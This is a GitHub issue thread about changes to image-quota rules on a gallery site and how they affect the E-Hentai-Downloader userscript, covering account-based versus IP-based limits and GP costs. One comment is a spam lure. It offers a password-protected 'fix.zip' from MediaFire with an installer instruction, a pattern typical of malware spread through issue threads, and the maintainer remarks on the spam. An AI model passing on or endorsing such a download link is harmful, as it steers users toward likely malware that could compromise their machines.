### ISSUE TITLE
new update

### ISSUE THREAD

**Issue by Triramama** [ccloli/E-Hentai-Downloader#299]
Broccoli, can you explain what this recent changelog means for our scraper, the only thing I understand is that they restricted ip hopping for image viewing and now when when you're out of quota limits you don't get a warning but automatically resized images instead
![image](https://github.com/user-attachments/assets/5021f9a5-6cfa-4ae0-9bc6-1ab03db5b3f3)

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ccloli** [comment]
Whoa, there're a lot of spams.

Anyway, AFAIK my limits is now account based since I redeem the More Pages hath perk, which means the image limits is now tighted to my account instead of IP, just like donators, so switching to another IP will not reset my limit. It's good or not? It depends on if you're using a shared IP with others.

For the other parts I'm not sure, since I dont have another account like old normal user which is IP based.

I think it's probably better than before for common viewer imo, because it said if you used up your limits, you can still get normal 1280x image instead of 509 error. So that if you're just browsing (or downloading resampled images) and don't care about resolution, then you can say there's nearly no limit.

If you want to grab original images, I guess there's nothing changed, you need image limits for recent gallery and GP for old gallery or large file or used up image limits.

The only thing I'm curious is:
> For IP-based quotas, it will no longer show what the limit is. This is intentional. It will however explicitly tell you on the home screen if your IP is currently restricted from using high-resolution images.

Is that mean for average IP based user, it never shows your remaining limits? Since my account is now account based limit, I cannot check it.

Besides there's a note in home page:
> Due to widespread usage of bulk downloaders, high-resolution images can be limited.

Not sure if there's any extra hidden limit, only god knows. I believe it's just a general kind notes.

**Comment by ls-gs** [comment]
There is the text difference between limited and without restriction.
> ![outage_info](https://github.com/user-attachments/assets/88bf0967-e95c-4d94-8c94-26aa0d0b2d21)

**Comment by ccloli** [comment]
> There is the text difference between limited and without restriction.

Thanks for the information, maybe I'll add a hint about that, for the first case the estimated cost should be all converted to GP only. Though for the second case, there's no way to warn user that he is going to use GP to download original images, even if it's a recent gallery.

So in a result, there's no change about how the calculation works, but for now, you don't know when you'll used up your image limits then start using GPs, only after that then you know it.

BTW the unlock function requires 20k GP, but the reset cost is 2 GP/limit. Not sure if it'll returns you (10k - current used) limit, it's a bit late for now in my timezone, I may check the forum to see how it works tomorrow.

P.S. For account based limit, it shows as normal, just [some text are changed](https://github.com/ccloli/E-Hentai-Downloader/issues/298#issuecomment-2310169000).

![](https://private-user-images.githubusercontent.com/8115912/361438992-afa16e86-50c9-436e-a7f0-cb3111fd7223.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4NzQzOTgsIm5iZiI6MTcyNDg3NDA5OCwicGF0aCI6Ii84MTE1OTEyLzM2MTQzODk5Mi1hZmExNmU4Ni01MGM5LTQzNmUtYTdmMC1jYjMxMTFmZDcyMjMuanBnP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDgyOCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA4MjhUMTk0MTM4WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9YjZjYWE2NGY4MzNhY2ZiY2VmMmVkYWUxMThlNGRkZDhjMjAzNDJjNzViMzViZmEzNzBiZTUzZGZkZGUyM2RkZCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.VOU34deOhKVR5rTrFjBIanapOSe3k--oOMamsQROcHM)

**Comment by a84r7a3rga76fg** [comment]
> when you're out of quota limits you don't get a warning but automatically resized images

No, it'll consume your GP, credits or hath when you reach the limit without your consent. If you don't have of those three, it'll stop.
